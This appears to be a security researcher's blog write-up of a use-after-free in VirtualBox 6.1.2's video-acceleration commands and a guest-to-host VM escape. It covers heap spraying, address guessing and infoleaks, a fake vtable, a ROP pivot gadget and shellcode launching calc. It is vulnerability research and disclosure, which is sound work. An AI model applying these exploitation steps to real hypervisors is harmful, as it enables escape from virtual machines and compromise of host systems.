As part of my month-long internship at STAR Labs, I was introduced to VirtualBox and learnt much about bug hunting and triaging, root-cause analysis and exploitation. This post will detail a use-after-free bug I found during the duration of the internship, and specifics on the VM escape exploit that I wrote utilising the bug. The latest version at the point of reporting was VirtualBox 6.1.2 r135662.

Setup

This blog post was written based on a Windows 10 host, with a Windows 7 guest VM. This setup would be ideal for following along: the guest VM should be configured to use the VBoxVGA graphics controller with Enable 2D Video Acceleration checked.

Before any bug hunting or exploitation can occur, a debug environment should be set-up in order to faciliate root-causing of crashes and exploit debugging. VirtualBox is protected by process hardening, thus it is not possible/non-trivial to attach to the VirtualBox process from our userland debuggers with the release version of VirtualBox. Fortunately, VirtualBox is open-source software, and a non-hardened debug version can be built, which would allow attaching with a debugger. In my case, my mentor anhdaden had a debug build of VirtualBox 6.1.0 r135406 with symbols, this was a great help in allowing me to dive straight into debugging.

Heeding the wise words of @_niklasb:

Finally, some knowledge about writing Windows kernel drivers will be required. This will be necessary for the exploit as we will be interacting with the host emulated devices from within the guest, which are only accessible in kernel-land. This was one of my references when writing my WDM driver. Deep knowledge on the topic is not necessary for following along with this exploit.

Background

The bug lies within the VirtualBox Video Acceleration (VBVA) feature that is provided by the Host-Guest Shared Memory Interface (HGSMI). To utilise this feature, the guest kernel driver should map the physical address 0xE0000000 to perform memory-mapped I/O (MMIO). The guest is expected to write to the VRAM buffer at physical address 0xE0000000 with the formatted HGSMI command, indicating which channel it is using and other details. After which the guest should send an out instruction to the IO port VGA_PORT_HGSMI_GUEST (0x3d0) to allow the emulated device to begin processing. The details can be reversed from the HGSMIBufferProcess function. To not do extra work, I made use of the code from another exploit in this attack surface, by voidsecurity.

For the VBVA service, it is handled by the vbvaChannelHandler function. Various VBVA commands can be sent and the bug lies in the VBVA_VHWA_CMD command, which is used for Video Hardware Acceleration (VHWA). Tracing the function calls in the debugger, you can determine the actual handler for the VHWA commands.

vbvaChannelHandler
  |_ vbvaVHWAHandleCommand
      |_ vbvaVHWACommandSubmit(Inner)
          |_ pThisCC->pDrv->pfnVHWACommandProcess = Display::i_handleVHWACommandProcess
              |_ pFramebuffer->ProcessVHWACommand = VBoxOverlayFrameBuffer.ProcessVHWACommand
                  |_ mOverlay.onVHWACommand = VBoxQGLOverlay::onVHWACommand
                      |_ mCmdPipe.postCmd = VBoxVHWACommandElementProcessor::postCmd
                          |_ pCmd->setData
                          |_ RTListAppend(&mCommandList, &pCmd->ListNode);

*once command is added to list, it is then processed

VBoxQGLOverlay::onVHWACommandEvent
 |_ mCmdPipe.getCmd
 |_ processCmd = VBoxQGLOverlay::processCmd
     |_ vboxDoVHWACmd = VBoxQGLOverlay::vboxDoVHWACmd
         |_ vboxDoVHWACmdExec = VBoxQGLOverlay::vboxDoVHWACmdExec 

VBoxQGLOverlay::vboxDoVHWACmdExec will be the most important function to begin analysis from, as it contains the meat of processing for the VHWA commands.

Vulnerability

Now that we’ve roughly familiarised with the code, we can dive into the vulnerable VHWA command. Within VBoxQGLOverlay::vboxDoVHWACmdExec, there are various commands that can do allocation, deleting, and operating on objects, which might be a familiar sight for CTF heap challenge junkies.

// src/VBox/Frontends/VirtualBox/src/VBoxFBOverlay.cpp:4669

void VBoxQGLOverlay::vboxDoVHWACmdExec(void RT_UNTRUSTED_VOLATILE_GUEST *pvCmd, int /*VBOXVHWACMD_TYPE*/ enmCmdInt, bool fGuestCmd)
{
    struct VBOXVHWACMD RT_UNTRUSTED_VOLATILE_GUEST *pCmd = (struct VBOXVHWACMD RT_UNTRUSTED_VOLATILE_GUEST *)pvCmd;
    VBOXVHWACMD_TYPE enmCmd = (VBOXVHWACMD_TYPE)enmCmdInt;

    switch (enmCmd)
    {
...
        case VBOXVHWACMD_TYPE_SURF_CREATE:
        {
            VBOXVHWACMD_SURF_CREATE RT_UNTRUSTED_VOLATILE_GUEST *pBody = VBOXVHWACMD_BODY(pCmd, VBOXVHWACMD_SURF_CREATE);
            Assert(!mGlOn == !mOverlayImage.hasSurfaces());
            initGl();
            makeCurrent();
            vboxSetGlOn(true);
            pCmd->rc = mOverlayImage.vhwaSurfaceCreate(pBody);
...
        case VBOXVHWACMD_TYPE_SURF_OVERLAY_UPDATE:
        {
            VBOXVHWACMD_SURF_OVERLAY_UPDATE RT_UNTRUSTED_VOLATILE_GUEST *pBody = VBOXVHWACMD_BODY(pCmd, VBOXVHWACMD_SURF_OVERLAY_UPDATE);
            Assert(!mGlOn == !mOverlayImage.hasSurfaces());
            initGl();
            makeCurrent();
            pCmd->rc = mOverlayImage.vhwaSurfaceOverlayUpdate(pBody);
...

This vulnerability lies within VBOXVHWACMD_TYPE_SURF_CREATE. When provided with a VBOXVHWACMD_TYPE_SURF_CREATE command, VBoxVHWAImage::vhwaSurfaceCreate will be called, which can create a new VBoxVHWASurfaceBase object. A pointer to that VBoxVHWASurfaceBase object will be stored in the calling object’s mSurfHandleTable member, which is simply an array of pointers indexed by a handle.

// src/VBox/Frontends/VirtualBox/src/VBoxFBOverlay.cpp:2287

int VBoxVHWAImage::vhwaSurfaceCreate(struct VBOXVHWACMD_SURF_CREATE RT_UNTRUSTED_VOLATILE_GUEST *pCmd)
{
...
    VBoxVHWASurfaceBase *surf = NULL;
...
        if (format.isValid())
        {
            surf = new VBoxVHWASurfaceBase(this,
                                           surfSize,
                                           primaryRect,
                                           QRect(0, 0, surfSize.width(), surfSize.height()),
                                           mViewport,
                                           format,
                                           pSrcBltCKey, pDstBltCKey, pSrcOverlayCKey, pDstOverlayCKey,
#ifdef VBOXVHWA_USE_TEXGROUP
                                           0,
#endif
                                           fFlags);
        }
...
        handle = mSurfHandleTable.put(surf);
        pCmd->SurfInfo.hSurf = (VBOXVHWA_SURFHANDLE)handle;

However, when certain command flags are enabled, rather than creating a new VBoxVHWASurfaceBase object, surf is set to an existing VBoxVHWASurfaceBase object instead.

// src/VBox/Frontends/VirtualBox/src/VBoxFBOverlay.cpp:2287

int VBoxVHWAImage::vhwaSurfaceCreate(struct VBOXVHWACMD_SURF_CREATE RT_UNTRUSTED_VOLATILE_GUEST *pCmd)
{
...
    VBoxVHWASurfaceBase *surf = NULL;
...
    if (pCmd->SurfInfo.surfCaps & VBOXVHWA_SCAPS_PRIMARYSURFACE)
    {
        bNoPBO = true;
        bPrimary = true;
        VBoxVHWASurfaceBase *pVga = vgaSurface(); /* == mDisplay.getVGA() == mDisplay.mSurfVGA */
...
                        surf = pVga;
...
        handle = mSurfHandleTable.put(surf);
        pCmd->SurfInfo.hSurf = (VBOXVHWA_SURFHANDLE)handle;

When this code path is followed, our mSurfHandleTable will hold a reference to the mSurfVGA of the mDisplay object. However, this mSurfVGA member may be replaced during other functionalities, for example, the resize functionality. Following a screen resize, which can be triggered by the guest, the following code will be executed.

// src/VBox/Frontends/VirtualBox/src/VBoxFBOverlay.cpp:3752

void VBoxVHWAImage::resize(const VBoxFBSizeInfo &size)
{
...
    VBoxVHWASurfaceBase *pDisplay = mDisplay.setVGA(NULL);
    if (pDisplay)
        delete pDisplay;
...
    pDisplay = new VBoxVHWASurfaceBase(this,
                                       dispSize,
                                       dispRect,
                                       dispRect,
                                       dispRect, /* we do not know viewport at the stage of precise, set as a
                                                    disp rect, it will be updated on repaint */
                                       format,
                                       NULL, NULL, NULL, NULL,
#ifdef VBOXVHWA_USE_TEXGROUP
                                       0,
#endif
                                       0 /* VBOXVHWAIMG_TYPE fFlags */);

While the mDisplay member’s mSurfVGA has been freed and updated with a new allocation, the mSurfHandleTable will still hold a pointer to the old freed VBoxVHWASurfaceBase object. This creates a use-after-free scenario as other VHWA commands like VBOXVHWACMD_TYPE_SURF_OVERLAY_UPDATE can still access this freed pointer through its handle, for various operations.

// src/VBox/Frontends/VirtualBox/src/VBoxFBOverlay.cpp:2823

int VBoxVHWAImage::vhwaSurfaceOverlayUpdate(struct VBOXVHWACMD_SURF_OVERLAY_UPDATE RT_UNTRUSTED_VOLATILE_GUEST *pCmd)
{
    VBoxVHWASurfaceBase *pSrcSurf = handle2Surface(pCmd->u.in.hSrcSurf); /*pSrcSurf = freed chunk*/
    AssertReturn(pSrcSurf, VERR_INVALID_PARAMETER);
    VBoxVHWASurfList *pList = pSrcSurf->getComplexList();
...

To perform the resize operation from the guest kernel driver, another VBVA command can be used instead of the VHWA command (VBVA_VHWA_CMD). The VBVA_INFO_SCREEN command ends off with calling resize, allowing us to trigger the use-after-free.

// src/VBox/Devices/Graphics/DevVGA_VBVA.cpp:2444

static DECLCALLBACK(int) vbvaChannelHandler(void *pvHandler, uint16_t u16ChannelInfo,
                                            void RT_UNTRUSTED_VOLATILE_GUEST *pvBuffer, HGSMISIZE cbBuffer)
{
...
    switch (u16ChannelInfo)
    {
...
        case VBVA_INFO_SCREEN:
            rc = VERR_INVALID_PARAMETER;
            if (cbBuffer >= sizeof(VBVAINFOSCREEN))
                rc = vbvaInfoScreen(pThisCC, (VBVAINFOSCREEN RT_UNTRUSTED_VOLATILE_GUEST *)pvBuffer);
            break;
vbvaInfoScreen
 |_ vbvaResize
     |_ pThisCC->pDrv->pfnVBVAResize = Display::i_displayVBVAResize

Exploitation

Heap Spray

Given our use-after-free vulnerability, the first step to exploitation would be to reclaim this freed allocation through another controlled allocation. Since our host is a Windows 10 machine, this means that the host heap will be handled by low fragmentation heap (LFH) and all sorts of confusing things. A semi-reliable way to reclaim our allocation would thus be to find a primitive within the VirtualBox code that allows the guest to make many allocations that have the same size as a VBoxVHWASurfaceBase, while allowing us to also control the contents of the allocation. The primitive that was used in the end was drvNATNetworkUp_AllocBuf, which is called when sending ethernet frames. Fortunately, my mentor already had the code for implementing this for heap spraying, saving me much effort in understanding the ethernet protocol. All that is needed to know about the primitive is that it can allocate 16-byte aligned sizes with data provided by the guest. The following diagram illustrates the use of this for heap spraying.

rip control

With this heap spray, we have control over the vtable member of the corrupted VBoxVHWASurfaceBase object. So how can we use this to gain rip control?

When inspecting a valid vtable for the VBoxVHWASurfaceBase, we can notice that the only entry is a function pointer to the vector deleting destructor function. So once we know the address of a memory region we can write to, we can write a fake vtable, replace the vtable member to point to our controlled vtable and delete the VBoxVHWASurfaceBase object through the VBOXVHWACMD_TYPE_SURF_DESTROY VHWA command, giving us control of instruction pointer rip.

For now, we have to achieve a infoleak with our bug before we can proceed any further in the exploit.

Getting an infoleak

After many hours at looking through the various VHWA commands to find a command which may leak some pointers back to the guest VRAM, I reached a dead-end on finding my infoleak. With some prodding, anhdaden led me down the path to realising a semi-reliable way finding an infoleak. This technique is based on the VRAM MMIO buffer that the guest is able to control in memory (described earlier). At my VM’s configuration of 256 MB of video memory, the VRAM buffer will have whopping size of 0x10000000 bytes. With such a large size, it becomes much more possible to guess the virtual address of this buffer in the host. Restarting the VM a few times, I noticed that the buffer was allocated at these few addresses.

start             end
0x00000000ACB0000-0x00000001ACB0000
0x00000000AEE0000-0x00000001AEE0000
0x00000000B4F0000-0x00000001B4F0000
0x00000000B1A0000-0x00000001B1A0000
0x00000000ADE0000-0x00000001ADE0000
0x00000000A670000-0x00000001A670000
0x00000000B0B0000-0x00000001B0B0000
0x00000000AC10000-0x00000001AC10000

With such large ranges, even if we guess an address like 0x00000000C000000, it still lands within the VRAM buffer! With this information, we could begin to build better primitives to leak DLL addresses, and maybe form arbitrary R/W primitives.

One small problem still remains however, although we know that an arbitrary address like 0x00000000C000000 would likely be in our controllable VRAM buffer, we do not know the offset of this address from the start of the buffer. Fortunately, there is a way to figure this out.

Let’s look into the VBoxVHWAImage::vhwaSurfaceOverlayUpdate function which implements the VBOXVHWACMD_TYPE_SURF_OVERLAY_UPDATE command. As the source code had many function calls that were actually inlined and other macros that were optimised after compilation, I found it easier to inspect the function with a decompiler.

// src/VBox/Frontends/VirtualBox/src/VBoxFBOverlay.cpp:2823

signed __int64 __fastcall VBoxVHWAImage::vhwaSurfaceOverlayUpdate(__int64 _this, uint8_t *_pCmd)
{
...
  pSrcSurf = *(VBoxVHWASurfaceBase **)(*(_QWORD *)(_this + 72) + 8i64 * (unsigned int)*((_QWORD *)_pCmd + 4));
...
  pList = (__int64 ***)pSrcSurf->mComplexList;              /* [1] */
...
  if ( _bittest(&v24, 9u) )
  {
...
  }
  else
  {
...
    if ( _bittest(&v25, 0xEu) )
      *(_QWORD *)(pList + 0x18) = pSrcSurf;                 /* [2] */
...
}

Looking at line [1], pList is a pointer taken from the VBoxVHWASurfaceBase object pSrcSurf. With our heap spray, we can control the value of pList. Later on, in line [2], pList is dereferenced and the member at offset 0x18 is set to a pointer to pSrcSurf. If we can set pList to point to our VRAM buffer, we will be able to leak a pointer from the heap! Furthermore, if pList = 0x00000000C000000, the pointer will be placed at 0x00000000C000018, we can scan for this change in memory and calculate the base address of the VRAM buffer based on the index of the pointer in the VRAM.

// src/VBox/Frontends/VirtualBox/src/VBoxFBOverlay.cpp:2823

signed __int64 __fastcall VBoxVHWAImage::vhwaSurfaceOverlayUpdate(__int64 _this, uint8_t *_pCmd)
{
...
  for ( i = **(__int64 ***)pList; i != *(__int64 **)pList; i = (__int64 *)*i )
    VBoxVHWAImage::vhwaDoSurfaceOverlayUpdate(this, pDstSurf, (VBoxVHWASurfaceBase *)i[2], pCmd);
...

It should be noted that the first member of pList is expected to be a valid pointer to a singly-linked-list, or the VM would crash while traversing as shown in the code snippet above. Thus the address 0x00000000C000000 should contain a valid linked-list pointer. An easy solution to fix this while we do not know the base address of the VRAM buffer is to spray the VRAM with 0x00000000C000000 which would reliably prevent this crash from occuring.

    uint64_t* v = (uint64_t*)&vram[0x1000];
    for (int i = 0; i < 0x6000000 / 8; i++) {
        v[i] = 0x00000000C000000;
    }

DLL infoleak

At this point, we know the base address of our VRAM buffer, and we also have a leak into the heap. With this information alone, we still cannot change rip to a meaningful address. We will need to create a DLL infoleak, enabling us to pivot into a ROP chain and gain code execution meaningfully. To achieve this, I made use of the VBOXVHWACMD_TYPE_SURF_OVERLAY_UPDATE yet again.

// src/VBox/Frontends/VirtualBox/src/VBoxFBOverlay.cpp:2823

signed __int64 __fastcall VBoxVHWAImage::vhwaSurfaceOverlayUpdate(__int64 _this, uint8_t *_pCmd)
{
...
  for ( i = **(__int64 ***)pList; i != *(__int64 **)pList; i = (__int64 *)*i )
    VBoxVHWAImage::vhwaDoSurfaceOverlayUpdate(this, pDstSurf, (VBoxVHWASurfaceBase *)i[2], pCmd);
...

As shown before, VBoxVHWAImage::vhwaSurfaceOverlayUpdate traverses the singly-linked-list pointed to by the first member of pList (which we control) and calls VBoxVHWAImage::vhwaDoSurfaceOverlayUpdate on the VBoxVHWASurfaceBase pointer located at offset 0x10 of each linked-list node.

__int64 __fastcall VBoxVHWAImage::vhwaDoSurfaceOverlayUpdate(__int64 _this, VBoxVHWASurfaceBase *_pDstSurf, VBoxVHWASurfaceBase *_pSrcSurf, _DWORD *pCmd)
{
...
  if ( _bittest(&v9, 0xCu) )
  {
    result = _pSrcSurf->field_90;
    _pSrcSurf->field_78 = result;
  }
...
}

Within VBoxVHWAImage::vhwaDoSurfaceOverlayUpdate, the above operation is done, where we control the value of pointer _pSrcSurf. From the small code snippet above, we can see that we’ll be able to copy a value from a certain memory address to a slightly lower memory address. But how is this useful to us?

Looking at some more slides from @_niklasb, he mentions that on Windows hosts, the memory region directly adjacent to the VRAM buffer is another region containing certain metadata about the VRAM buffer itself. We can verify this finding ourselves in the debugger, and in fact the memory region is set to R/W permissions. Combining this with the primitive we’ve just discussed, we can repeatedly copy the "VRam" pointer (which points within VBoxDD.dll) to a lower address. Since this metadata is right adjacent to our VRAM buffer that is readable from the guest, we just need to “drag” this DLL pointer right over the page boundary into our VRAM. Then we can simply read this pointer from memory!

The implementation detail is slightly complicated, but the general idea is to form a valid linked-list within the VRAM ourselves, which repeatedly calls VBoxVHWAImage::vhwaDoSurfaceOverlayUpdate on decreasing addresses.

As a bonus, this technique looks very satisfying in the memory dump :D

If left this way, the excess pointers that clobber the metadata lead to a BSOD on the host. The same technique should be repeated, but this time to null out the excess pointers.

rop2win

With a DLL leak attained, we can now write a ROP chain to call VirtualAlloc, allocating a RWX region that we copy our shellcode to and jump to it. In order to pivot from the destructor call to our ROP chain, we can set rip to a bad value to result in a crash and check the state of the registers. In this case, the value of rax points to our VRAM buffer. The following gadget can thus be used to pivot to our ROP chain.

In 6.1.2 r135662 (Release ver.)

0x0000000180042b3e: xchg eax, esp; ror byte ptr [rax - 0x75], 0x5c; and al, 0x30; add rsp, 0x20; pop rdi; ret;

With this, our exploit chain is complete! Due to exploit clobbering the metadata, the VM is not able to gracefully continue, however we can still spawn our calc!

References